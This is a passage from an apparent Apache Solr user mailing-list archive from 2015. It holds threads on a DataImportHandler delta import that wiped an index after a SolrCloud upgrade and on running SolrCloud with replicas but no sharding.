> https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities,
> the "upconfig" command. That pushes the configset up to ZK and gives
> it a name.
>
> Now, you create a collection and it needs a configset stored in ZK.
> It's a little tricky in that if you do _not_ explicitly specify a
> configest (using the collection.configName parameter to the
> collections API CREATE command), then by default it'll look for a
> configset with the same name as the collection. If it doesn't find
> one, _and_ there is one and only one configset, then it'll use that
> one (personally I find that confusing, but that's the way it works).
> See: https://cwiki.apache.org/confluence/display/solr/Collections+API
>
> If you have two or more configsets in ZK, then either the configset
> name has to be identical to the collection name (if you don't specify
> collection.configName), _or_ you specify collection.configName at
> create time.
>
> NOTE: there are _no_ config files on the local disk! When a replica of
> a collection loads, it "knows" what collection it's part of and pulls
> the corresponding configset from ZK.
>
> So typically the process is this.
> > you create the config set by editing all the usual suspects, schema.xml,
> solrconfig.xml, DIH config etc.
> > you put those configuration files into some version control system (you
> are using one, right?)
> > you push the configs to Zookeeper
> > you create the collection
> > you figure out you need to change the configs so you
>   > check the code out of your version control
>   > edit them
>   > put the current version back into version control
>   > push the configs up to zookeeper, overwriting the ones already
> there with that name
>   > reload the collection or bounce all the servers. As each replica
> in the collection comes up,
>  it downloads the latest configs from Zookeeper to memory (not to
> disk) and uses them.
>
> Seems like a long drawn-out process, but pretty soon it's automatic.
> And really, the only extra step is the push to Zookeeper, the rest is
> just like old-style cores with the exception that you don't have to
> manually push all the configs to all the machines hosting cores.
>
> Notice that I have mostly avoided talking about "cores" here. Although
> it's true that a replica in a collection is just another core, it's
> "special" in that it has certain very specific properties set. I
> _strongly_ advise you stop thinking about old-style Solr cores and
> instead thing about collections and replicas. And above all, do _not_
> use the admin core API to try to create members of a collection
> (cores), use the collections API to ADDREPLICA/DELETEREPLICA instead.
> Loading/unloading cores is less "fraught", but I try to avoid that too
> and use
>
> Best,
> Erick
>
> On Sat, Sep 19, 2015 at 9:08 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Thanks Erick, I will report back once the reindex is finished. Oh, your
> > answer reminded me of another question - Regarding configsets the
> > documentation sa

Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Thank you for the prompt response Erick. I did a full-import yesterday, you
are correct that I did not push dataimport.properties to ZK, should it have
not worked even for a full import ?. You may be right about 'clean' option,
I will reindex again today. BTW how do we push a single file to a specific
config name in zookeeper ?


Thanks,

Ravi Kiran Bhaskar


On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Could not read DIH properties from
> /configs/sitesearchcore/dataimport.properties
>
> This looks like somehow you didn't push this file up to Zookeeper. You
> can check what files are there in the admin UI. How you indexed
> yesterday is a mystery though, unless somehow this file was removed
> from ZK.
>
> As for why you lost all the docs, my suspicion is that you have the
> clean param set up for delta import
>
> FWIW,
> Erick
>
> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave)
> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using
> > SolrEntityProcessor yesterday, all of them indexed properly. Today
> morning
> > I just ran the DIH again with delta import and I lost all docs...what am
> I
> > missing ? Did anybody face similar issue ?
> >
> > Here are the errors in the logs
> >
> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was
> not
> > closed!
> > req=waitSearcher=true=
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> > 9/19/2015,
> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM
> > WARN null ZKPropertiesWriter Could not read DIH properties from
> > /configs/sitesearchcore/dataimport.properties :class
> > org.apache.zookeeper.KeeperException$NoNodeException
> >
> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
> > = NoNode for /configs/sitesearchcore/dataimport.properties
> > at
> org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
> > at
> org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
> > at
> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
> > at
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
> > at
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
> > at
> org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
> > at
> org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
> > at
> org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
> > at
> org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
> > at
> org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)
> >
> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was
> not
> > closed!
> > req=waitSearcher=true=
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> > 9/19/2015,
> > 11:16:43 AM ERROR null SolrCore prev == info : false
> >
> >
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
>


SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave)
to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using
SolrEntityProcessor yesterday, all of them indexed properly. Today morning
I just ran the DIH again with delta import and I lost all docs...what am I
missing ? Did anybody face similar issue ?

Here are the errors in the logs

9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was not
closed!
req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
9/19/2015,
2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM
WARN null ZKPropertiesWriter Could not read DIH properties from
/configs/sitesearchcore/dataimport.properties :class
org.apache.zookeeper.KeeperException$NoNodeException

org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
= NoNode for /configs/sitesearchcore/dataimport.properties
at org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
at org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
at 
org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
at 
org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
at 
org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
at 
org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
at 
org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
at 
org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
at 
org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
at 
org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)

9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was not
closed!
req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
9/19/2015,
11:16:43 AM ERROR null SolrCore prev == info : false



Thanks

Ravi Kiran Bhaskar


Re: SolrCloud clarification/Question

2015-09-18 Thread Ravi Solr
Thank you very much Sameer, Erick and Upayavira. I got the solr cloud
working !!! Hurray !!

Cheers

Ravi Kiran Bhaskar

On Thu, Sep 17, 2015 at 3:10 AM, Upayavira <u...@odoko.co.uk> wrote:

> and replicationFactor is the number of copies of your data, not the
> number of servers marked 'replica'. So as has been said, if you have one
> leader, and three replicas, your replicationFactor will be 4.
>
> Upayavira
>
> On Thu, Sep 17, 2015, at 03:29 AM, Erick Erickson wrote:
> > Ravi:
> >
> > Sameer is correct on how to get it done in one go.
> >
> > Don't get too hung up on replicationFactor. You can always
> > ADDREPLICA after the collection is created if you need to.
> >
> > Best,
> > Erick
> >
> >
> > On Wed, Sep 16, 2015 at 12:44 PM, Sameer Maggon
> > <sam...@measuredsearch.com> wrote:
> > > I just gave an example API call, but for your scenario, the
> > > replicationFactor will be 4 (replicationFactor=4). In this way, all 4
> > > machines will have the same copy of the data and you can put an LB in
> front
> > > of those 4 machines.
> > >
> > > On Wed, Sep 16, 2015 at 12:00 PM, Ravi Solr <ravis...@gmail.com>
> wrote:
> > >
> > >> OK...I understood numShards=1, when you say replicationFactor=2 what
> does
> > >> it mean ? I have 4 machines, then, only 3 copies of data (1 at leader
> and 2
> > >> replicas) ?? so am i not under utilizing one machine ?
> > >>
> > >> I was more thinking in the lines of a Mesh connectivity format i.e.
> > >> everybody has others copy so that I can put all 4 machines behind a
> Load
> > >> Balancer...Is that a wrong way to look at it ?
> > >>
> > >> Thanks
> > >>
> > >> Ravi Kiran
> > >>
> > >> On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <
> sam...@measuredsearch.com>
> > >> wrote:
> > >>
> > >> > You'll have to say numShards=1 and replicationFactor=2.
> > >> >
> > >> > http://
> > >> >
> > >> >
> > >>
> [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2
> > >> >
> > >> > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com>
> wrote:
> > >> >
> > >> > > Thank you very much for responding Sameer so numShards=0 and
> > >> > > replicationFactr=4 if I have 4 machines ??
> > >> > >
> > >> > > Thanks
> > >> > >
> > >> > > Ravi Kiran Bhaskar
> > >> > >
> > >> > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon <
> > >> > sam...@measuredsearch.com
> > >> > > >
> > >> > > wrote:
> > >> > >
> > >> > > > Absolutely. You can have a collection with just replicas and no
> > >> shards
> > >> > > for
> > >> > > > redundancy and have a load balancer in front of it that removes
> the
> > >> > > > dependency on a single node. One of them will assume the role
> of a
> > >> > > leader,
> > >> > > > and in case that leader goes down, one of the replicas will be
> > >> elected
> > >> > > as a
> > >> > > > leader and your application will be fine.
> > >> > > >
> > >> > > > Thanks,
> > >> > > >
> > >> > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com>
> > >> wrote:
> > >> > > >
> > >> > > > > Hello,
> > >> > > > >  We are trying to move away from Master-Slave
> configuration
> > >> > to
> > >> > > a
> > >> > > > > SolrCloud environment. I have a couple of questions.
> Currently in
> > >> the
> > >> > > > > Master-Slave setup we have 4 Machines 2 of which are indexers
> and 2
> > >> > of
> > >> > > > them
> > >> > > > > are query servers. The query servers are fronted via Load
> Balancer.
> > >> > > > >
> > >> > > > > There are 3 solr cores for 3 different/separate applications
> > >> > (mutually
> > >> > > > > exclusive). Each core is a complete index of all docs (i.e.
> the
> > >> data
> > >> > is
> > >> > > > not
> > >> > > > > sharded).
> > >> > > > >
> > >> > > > >   We intend to keep it in a non-sharded mode even after
> the
> > >> > > SolrCloud
> > >> > > > > mode.The prime motivation to move to cloud is to effectively
> use
> > >> all
> > >> > > > > servers for indexing and querying (read fault
> tolerant/redundant).
> > >> > > > >
> > >> > > > > So, the real question is, can SolrCloud be used without
> shards ?
> > >> > i.e. a
> > >> > > > > "collection" resides entirely on one machine rather than
> > >> partitioning
> > >> > > > data
> > >> > > > > onto different machines ?
> > >> > > > >
> > >> > > > > Thanks
> > >> > > > >
> > >> > > > > Ravi Kiran Bhaskar
> > >> > > > >
> > >> > > >
> > >> > > >
> > >> > > >
> > >> > > > --
> > >> > > > *Sameer Maggon*
> > >> > > > Measured Search
> > >> > > > c: 310.344.7266
> > >> > > > www.measuredsearch.com <http://measuredsearch.com>
> > >> > > >
> > >> > >
> > >> >
> > >> >
> > >> >
> > >> > --
> > >> > *Sameer Maggon*
> > >> > Measured Search
> > >> > c: 310.344.7266
> > >> > www.measuredsearch.com <http://measuredsearch.com>
> > >> >
> > >>
> > >
> > >
> > >
> > > --
> > > *Sameer Maggon*
> > > Measured Search
> > > c: 310.344.7266
> > > www.measuredsearch.com <http://measuredsearch.com>
>


SolrCloud clarification/Question

2015-09-16 Thread Ravi Solr
Hello,
 We are trying to move away from Master-Slave configuration to a
SolrCloud environment. I have a couple of questions. Currently in the
Master-Slave setup we have 4 Machines 2 of which are indexers and 2 of them
are query servers. The query servers are fronted via Load Balancer.

There are 3 solr cores for 3 different/separate applications (mutually
exclusive). Each core is a complete index of all docs (i.e. the data is not
sharded).

  We intend to keep it in a non-sharded mode even after the SolrCloud
mode.The prime motivation to move to cloud is to effectively use all
servers for indexing and querying (read fault tolerant/redundant).

So, the real question is, can SolrCloud be used without shards ? i.e. a
"collection" resides entirely on one machine rather than partitioning data
onto different machines ?

Thanks

Ravi Kiran Bhaskar


Re: SolrCloud clarification/Question

2015-09-16 Thread Ravi Solr
OK...I understood numShards=1, when you say replicationFactor=2 what does
it mean ? I have 4 machines, then, only 3 copies of data (1 at leader and 2
replicas) ?? so am i not under utilizing one machine ?

I was more thinking in the lines of a Mesh connectivity format i.e.
everybody has others copy so that I can put all 4 machines behind a Load
Balancer...Is that a wrong way to look at it ?

Thanks

Ravi Kiran

On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <sam...@measuredsearch.com>
wrote:

> You'll have to say numShards=1 and replicationFactor=2.
>
> http://
>
> [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2
>
> On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> wrote:
>
> > Thank you very much for responding Sameer so numShards=0 and
> > replicationFactr=4 if I have 4 machines ??
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon <
> sam...@measuredsearch.com
> > >
> > wrote:
> >
> > > Absolutely. You can have a collection with just replicas and no shards
> > for
> > > redundancy and have a load balancer in front of it that removes the
> > > dependency on a single node. One of them will assume the role of a
> > leader,
> > > and in case that leader goes down, one of the replicas will be elected
> > as a
> > > leader and your application will be fine.
> > >
> > > Thanks,
> > >
> > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > >
> > > > Hello,
> > > >  We are trying to move away from Master-Slave configuration
> to
> > a
> > > > SolrCloud environment. I have a couple of questions. Currently in the
> > > > Master-Slave setup we have 4 Machines 2 of which are indexers and 2
> of
> > > them
> > > > are query servers. The query servers are fronted via Load Balancer.
> > > >
> > > > There are 3 solr cores for 3 different/separate applications
> (mutually
> > > > exclusive). Each core is a complete index of all docs (i.e. the data
> is
> > > not
> > > > sharded).
> > > >
> > > >   We intend to keep it in a non-sharded mode even after the
> > SolrCloud
> > > > mode.The prime motivation to move to cloud is to effectively use all
> > > > servers for indexing and querying (read fault tolerant/redundant).
> > > >
> > > > So, the real question is, can SolrCloud be used without shards ?
> i.e. a
> > > > "collection" resides entirely on one machine rather than partitioning
> > > data
> > > > onto different machines ?
> > > >
> > > > Thanks
> > > >
> > > > Ravi Kiran Bhaskar
> > > >
> > >
> > >
> > >
> > > --
> > > *Sameer Maggon*
> > > Measured Search
> > > c: 310.344.7266
> > > www.measuredsearch.com <http://measuredsearch.com>
> > >
> >
>
>
>
> --
> *Sameer Maggon*
> Measured Search
> c: 310.344.7266
> www.measuredsearch.com <http://measuredsearch.com>
>


  1   2   3   4   >